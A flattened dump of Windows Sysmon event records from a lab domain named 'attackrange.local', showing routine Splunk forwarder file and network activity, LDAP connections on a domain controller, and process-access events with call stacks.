07:43:14.678{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A00F87CAA22CA7ADF3814AA6DB03E78,SHA256=DD30A428C3E08A319AC9C27BBAB89065DD4B2D2FB4F56816252B3BFB29C294A5,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000805876Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:14.697{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F845B4869AD6BB7B27864994FBAB57CF,SHA256=0D230F36D5CF05C79A70D04171B8B180DCE490239ABBCEEF74883807C481DA94,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805875Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:11.804{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57141-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 354300x80000000000000001045738Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:07.873{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50890-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001045737Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:07.873{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50890-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001045736Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:15.696{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D72CE0834FC9F81AC8DBD20FD3DBC5F7,SHA256=581599A2889152571934E967B223E23472042B42F3299CC6C147725266424106,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805878Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:15.713{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=843D26EBBA7BB217FDBD996B0EEA1152,SHA256=10A592FAFACCF0A3EF6F62052714163A3441DF83EA536C664492664B8E09862A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045735Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:15.347{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D6576C650EC8B80BCE4E848626A770FA,SHA256=CC4CF15AD9D9D60D9E13F7B16827893414849D1AB9DC89AFF3B6E2378D8A898B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045734Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:15.347{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=27EB8568DABAB187E4325E7F83A75965,SHA256=00360B33C82F6EE8807D8F69981AD0DA1159ACFA5B498C58C06CBAD97B7CCDC1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805877Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:13.208{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57142-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001045739Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:16.715{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=638FA9E2252F2F071D49AF91CB12F2B2,SHA256=3AFAA1CC63DBC2808ABBF575555853EE926F0204B74CE02510171A4696F5BCC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805879Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:16.729{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEA87F8B84B8062E1E2849FD040845B2,SHA256=E3A5B545EC35255401B6BBC434CA685B9F264B21D966A73AD26713B867CF934E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805881Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:17.776{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8D1B24E206DF8190C993B4501484BE4,SHA256=2FB1C930861F2B3B4384BD460BB45E16761206D6771247648D2EC8EFB66E9F61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045740Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:17.731{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58FE8E8F7D53FB014B671E81A3D50638,SHA256=BC3FA678B547AFDFF32DDDBE429F6862975974AFB79039542738ABA9BB3B6912,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805880Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:17.026{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=74DB58B5B5441FA4F1013BA72D16252C,SHA256=BF711EA8112F468C361C3C213DF6FB6DA5F9CA36F52818403892FBFA2B407EB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805882Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:18.823{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4B73BCCD196B6DE64B84806D86DDA78,SHA256=A077B8EDD6C68C35E57D1F0B6558B2358A7A3685064875FE8F05EFF9A6EB6E55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045742Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:18.746{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B051236AF1B7E6A73B09C5F51CF81B5C,SHA256=0FB624D3B7DEFBF01439A7BC7C95F3428BC6D7CC889794338B3672CCBD923F8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045741Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:43:18.178{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805883Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:19.823{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D1CBEC932E1768B4E9DBB712A5486DA,SHA256=CD6C77A31573FDBE53C86715DD3883A28FF3759A2B65C29172E33B587988585B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045743Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:19.778{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA0C0BB7DAD10353BC99F6CC0741CC52,SHA256=F7C79F8BEF8BD6A350686863CB732EFEBE83AAB0D06F33E1D3D420583189AABC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805886Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:20.885{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF98737AF8EE7496AE0341C7650CF6B9,SHA256=010A7A81369F105E245CB647383C2FC44AA2CEB6D903D4629A893F60518F3C0A,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001045745Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:20.778{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7C4FDB005BCB137AB9638BBECF74F20,SHA256=4763C8BC04FC192333BCFCE6E986A46282D68491287A0187B38F3B8F9D2CE328,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805885Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:20.307{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805884Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:18.330{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57143-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001045744Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:12.653{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50891-false10.0.1.12-8000- 23542300x8000000000000000805887Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:21.932{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6EB70DECB9660DD6FAB55C2F9C892C2F,SHA256=30BAEDAA4783C08CB01AD5EF5588A776A9CFD44CBB6D8AEA452B49EE4A57B8C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045746Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:21.796{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9C41EE2C625C9531DAD762B9BC61EC2,SHA256=71895BB5E813CD8A0FAE411B34EBE5CB89FAD643F29B10938F01BDEF78F24F53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045747Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:22.844{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D267987A5D58FA83A6EC3C7B20474F92,SHA256=428631DE69F0DF62CA29EEDD851F37D19DC32E817187D73D0E1DC17523011340,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805889Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:22.963{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5113310500A44E009F51496B7FDA595,SHA256=8653A632140F31B533723EDC4B6CCA7727CD06E54A236E6381654DB6FF7A7940,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805888Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:20.440{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57144-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000805890Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:23.979{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8CEA903A33FE7D7A4EA4AA160C1D1DA,SHA256=BF594DD0250B8313FB2B46297831FEFFDB2A1C1685D7296E2B51ECBA3C35D222,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045748Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:23.913{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23C2B8401F68288AD18F15BEAA68095D,SHA256=2B151289938E41137AC7FD0CF82DBF0D145DC03CCC0159C955E0DC49F035899E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045749Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:24.929{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A64FBDFA263AE88808CB3CC421E8C668,SHA256=CF834E036EEA70907F3CCA773BA82542E2DE44F717A0700B3D1A8806DEC518ED,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000805917Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.791{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F29C-60EB-3579-00000000D001}3120C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805916Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.791{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805915Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:24.791{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805914Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.791{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805913Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:24.791{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805912Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.791{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805911Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:24.791{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805910Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.791{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805909Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:24.791{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805908Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.791{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 